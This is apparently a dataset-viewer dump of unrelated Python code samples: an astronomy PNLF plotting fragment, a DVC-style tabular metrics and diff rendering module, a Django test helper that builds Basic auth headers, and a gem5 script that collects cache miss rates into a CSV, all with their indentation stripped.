mu = fitter([24])[0]
filename = basedir / 'reports' / 'figures' / f'{galaxy.name}_PNLF'
plot_pnlf(tbl[tbl['type']=='PN']['mOIII'],mu,galaxy.completeness_limit,binsize=0.25,mhigh=32,filename=filename)
print(f'{galaxy.name}: {mu:.2f} vs {parameters[galaxy.name]["mu"]:.2f}')
|
from collections.abc import Mapping
from itertools import chain, repeat, zip_longest
from operator import itemgetter
from typing import (
TYPE_CHECKING,
Any,
Dict,
ItemsView,
Iterable,
Iterator,
List,
MutableSequence,
Sequence,
Tuple,
Union,
overload,
)
from funcy import reraise
if TYPE_CHECKING:
from dvc.ui.table import CellT
class Column(List["CellT"]):
pass
def with_value(value, default):
return default if value is None else value
class TabularData(MutableSequence[Sequence["CellT"]]):
def __init__(self, columns: Sequence[str], fill_value: str = ""):
self._columns: Dict[str, Column] = {name: Column() for name in columns}
self._keys: List[str] = list(columns)
self._fill_value = fill_value
@property
def columns(self) -> List[Column]:
return list(map(self.column, self.keys()))
def column(self, name: str) -> Column:
return self._columns[name]
def items(self) -> ItemsView[str, Column]:
projection = {k: self.column(k) for k in self.keys()}
return projection.items()
def keys(self) -> List[str]:
return self._keys
def _iter_col_row(
self, row: Sequence["CellT"]
) -> Iterator[Tuple["CellT", Column]]:
for val, col in zip_longest(row, self.columns):
if col is None:
break
yield with_value(val, self._fill_value), col
def append(self, value: Sequence["CellT"]) -> None:
for val, col in self._iter_col_row(value):
col.append(val)
def extend(self, values: Iterable[Sequence["CellT"]]) -> None:
for row in values:
self.append(row)
def insert(self, index: int, value: Sequence["CellT"]) -> None:
for val, col in self._iter_col_row(value):
col.insert(index, val)
def __iter__(self) -> Iterator[List["CellT"]]:
return map(list, zip(*self.columns))
def __getattr__(self, item: str) -> Column:
with reraise(KeyError, AttributeError):
return self.column(item)
def __getitem__(self, item: Union[int, slice]):
func = itemgetter(item)
it = map(func, self.columns)
if isinstance(item, slice):
it = map(list, zip(*it))
return list(it)
@overload
def __setitem__(self, item: int, value: Sequence["CellT"]) -> None:
...
@overload
def __setitem__(
self, item: slice, value: Iterable[Sequence["CellT"]]
) -> None:
...
def __setitem__(self, item, value) -> None:
it = value
if isinstance(item, slice):
n = len(self.columns)
normalized_rows = (
chain(val, repeat(self._fill_value, n - len(val)))
for val in value
)
# we need to transpose those rows into columnar format
# as we work in terms of column-based arrays
it = zip(*normalized_rows)
for i, col in self._iter_col_row(it):
col[item] = i
def __delitem__(self, item: Union[int, slice]) -> None:
for col in self.columns:
del col[item]
def __len__(self) -> int:
return len(self.columns[0])
@property
def shape(self) -> Tuple[int, int]:
return len(self.columns), len(self)
def drop(self, *col_names: str) -> None:
for col_name in col_names:
self._keys.remove(col_name)
self._columns.pop(col_name)
def rename(self, from_col_name: str, to_col_name: str) -> None:
self._columns[to_col_name] = self._columns.pop(from_col_name)
self._keys[self._keys.index(from_col_name)] = to_col_name
def project(self, *col_names: str) -> None:
self.drop(*(set(self._keys) - set(col_names)))
self._keys = list(col_names)
def to_csv(self) -> str:
import csv
from io import StringIO
buff = StringIO()
writer = csv.writer(buff)
writer.writerow(self.keys())
for row in self:
writer.writerow(row)
return buff.getvalue()
def add_column(self, name: str) -> None:
self._columns[name] = Column([self._fill_value] * len(self))
self._keys.append(name)
def row_from_dict(self, d: Dict[str, "CellT"]) -> None:
keys = self.keys()
for key in d:
if key not in keys:
self.add_column(key)
row: List["CellT"] = [
with_value(d.get(key), self._fill_value) for key in self.keys()
]
self.append(row)
def render(self, **kwargs: Any):
from dvc.ui import ui
ui.table(self, headers=self.keys(), **kwargs)
def as_dict(self, cols: Iterable[str] = None) -> Iterable[Dict[str, str]]:
keys = self.keys() if cols is None else set(cols)
return [
{k: self._columns[k][i] for k in keys} for i in range(len(self))
]
def _normalize_float(val: float, precision: int):
return f"{val:.{precision}g}"
def _format_field(
val: Any, precision: int = None, round_digits: bool = False
) -> str:
def _format(_val):
if isinstance(_val, float) and precision:
func = round if round_digits else _normalize_float
return func(_val, precision)
if isinstance(_val, Mapping):
return {k: _format(v) for k, v in _val.items()}
if isinstance(_val, list):
return [_format(x) for x in _val]
return _val
return str(_format(val))
def diff_table(
diff,
title: str,
old: bool = True,
no_path: bool = False,
show_changes: bool = True,
precision: int = None,
round_digits: bool = False,
on_empty_diff: str = None,
) -> TabularData:
headers: List[str] = ["Path", title, "Old", "New", "Change"]
fill_value = "-"
td = TabularData(headers, fill_value=fill_value)
for fname, diff_in_file in diff.items():
for item, change in sorted(diff_in_file.items()):
old_value = with_value(change.get("old"), fill_value)
new_value = with_value(change.get("new"), fill_value)
diff_value = with_value(
change.get("diff", on_empty_diff), fill_value
)
td.append(
[
fname,
str(item),
_format_field(old_value, precision, round_digits),
_format_field(new_value, precision, round_digits),
_format_field(diff_value, precision, round_digits),
]
)
if no_path:
td.drop("Path")
if not show_changes:
td.drop("Change")
if not old:
td.drop("Old")
td.rename("New", "Value")
return td
def show_diff(
diff,
title: str,
old: bool = True,
no_path: bool = False,
show_changes: bool = True,
precision: int = None,
round_digits: bool = False,
on_empty_diff: str = None,
markdown: bool = False,
) -> None:
td = diff_table(
diff,
title=title,
old=old,
no_path=no_path,
show_changes=show_changes,
precision=precision,
round_digits=round_digits,
on_empty_diff=on_empty_diff,
)
td.render(markdown=markdown)
def metrics_table(
metrics,
all_branches: bool = False,
all_tags: bool = False,
all_commits: bool = False,
precision: int = None,
round_digits: bool = False,
):
from dvc.utils.diff import format_dict
from dvc.utils.flatten import flatten
td = TabularData(["Revision", "Path"], fill_value="-")
for branch, val in metrics.items():
for fname, metric in val.items():
row_data: Dict[str, str] = {"Revision": branch, "Path": fname}
flattened = (
flatten(format_dict(metric))
if isinstance(metric, dict)
else {"": metric}
)
row_data.update(
{
k: _format_field(v, precision, round_digits)
for k, v in flattened.items()
}
)
td.row_from_dict(row_data)
rev, path, *metrics_headers = td.keys()
td.project(rev, path, *sorted(metrics_headers))
if not any([all_branches, all_tags, all_commits]):
td.drop("Revision")
return td
def show_metrics(
metrics,
markdown: bool = False,
all_branches: bool = False,
all_tags: bool = False,
all_commits: bool = False,
precision: int = None,
round_digits: bool = False,
) -> None:
td = metrics_table(
metrics,
all_branches=all_branches,
all_tags=all_tags,
all_commits=all_commits,
precision=precision,
round_digits=round_digits,
)
td.render(markdown=markdown)
|
from django.contrib.auth.models import User
from mixer.backend.django import mixer
import base64
from socialDistribution.models import LocalAuthor
TEST_PASSWORD = "123456"
def create_author():
user = mixer.blend(User)
user.set_password(TEST_PASSWORD)
user.save()
author = LocalAuthor.objects.create(username=user.username, user=user)
return LocalAuthor.objects.get(id=author.id) # refetch to get the generated ID
def get_basic_auth(author):
username = author.user.username
credentials = str.encode(f'{username}:{TEST_PASSWORD}')
return {
'HTTP_AUTHORIZATION': 'Basic %s' % base64.b64encode(credentials).decode("ascii"),
}
|
import glob
import os
dir_names = glob.glob("prefetch_*")
names = []
miss_rates = []
for dir_name in dir_names:
os.chdir(dir_name)
myCmd = os.popen('grep "l2.overall_miss_rate::total" stats.txt').readlines()
print(myCmd)
line = myCmd[1].strip()
temp = dir_name.split("_")
name = "".join([temp[1], "_", temp[2]])
names.append(name)
miss_rate = line.split()[1]
miss_rates.append(miss_rate)
os.chdir("../")
names_csv = ','.join(names)
miss_rates_csv = ','.join(miss_rates)
with open("results.csv", "w") as results:
results.write(names_csv + "\n")
results.write(miss_rates_csv)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.